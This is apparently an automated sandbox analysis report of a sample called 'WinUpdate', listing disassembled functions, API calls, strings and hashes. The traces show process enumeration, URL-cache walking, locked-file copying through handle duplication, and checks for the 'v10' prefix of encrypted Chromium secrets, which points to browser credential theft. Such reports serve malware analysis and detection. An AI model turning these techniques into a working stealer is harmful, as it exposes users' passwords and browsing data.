                                                                                                                                                                                                                                                                                                • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                                                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                                                                                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                                                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                                                                                                • API String ID: 2744995895-28296030
                                                                                                                                                                                                                                                                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                                                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                                                                                                                                                                                                                • String ID: chp$v10
                                                                                                                                                                                                                                                                                                • API String ID: 4165125987-2783969131
                                                                                                                                                                                                                                                                                                • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                                                                                                                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                                                                                                • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                                                                                                                                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 free 585->588 590 413edb-413ee2 587->590 588->590 598 413ee4 590->598 599 413ee7-413efe 590->599 604 413ea2-413eae CloseHandle 592->604 596 413e61-413e68 593->596 597 413e37-413e44 GetModuleHandleW 593->597 596->592 602 413e6a-413e76 596->602 597->596 601 413e46-413e5c GetProcAddress 597->601 598->599 599->580 601->596 602->592 604->583
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                                                                                                                                • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                                                                                                • API String ID: 1344430650-1740548384
                                                                                                                                                                                                                                                                                                • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                                                                                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                                                                                                • String ID: bhv
                                                                                                                                                                                                                                                                                                • API String ID: 4234240956-2689659898
                                                                                                                                                                                                                                                                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                                                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                                                                                • API String ID: 2941347001-70141382
                                                                                                                                                                                                                                                                                                • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                                                                                                                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 643 44671d-446726 641->643 644 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->644 646 446747-44674b 643->646 647 446728-44672d 643->647 652 4467ac-4467b7 __setusermatherr 644->652 653 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 644->653 646->642 648 44674d-44674f 646->648 647->642 650 446734-44673b 647->650 651 446755-446758 648->651 650->642 654 44673d-446745 650->654 651->644 652->653 657 446810-446819 653->657 658 44681e-446825 653->658 654->651 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 664 446834-446838 660->664 665 44683a-44683e 660->665 662 446845-44684b 661->662 663 446872-446877 661->663 667 446853-446864 GetStartupInfoW 662->667 668 44684d-446851 662->668 663->661 664->660 664->665 665->662 669 446840-446842 665->669 671 446866-44686a 667->671 672 446879-44687b 667->672 668->667 668->669 669->662 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2827331108-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                                                                                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                                                                                                                                                                                                                • String ID: visited:
                                                                                                                                                                                                                                                                                                • API String ID: 1157525455-1702587658
                                                                                                                                                                                                                                                                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                                                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 free 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                                                                                • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
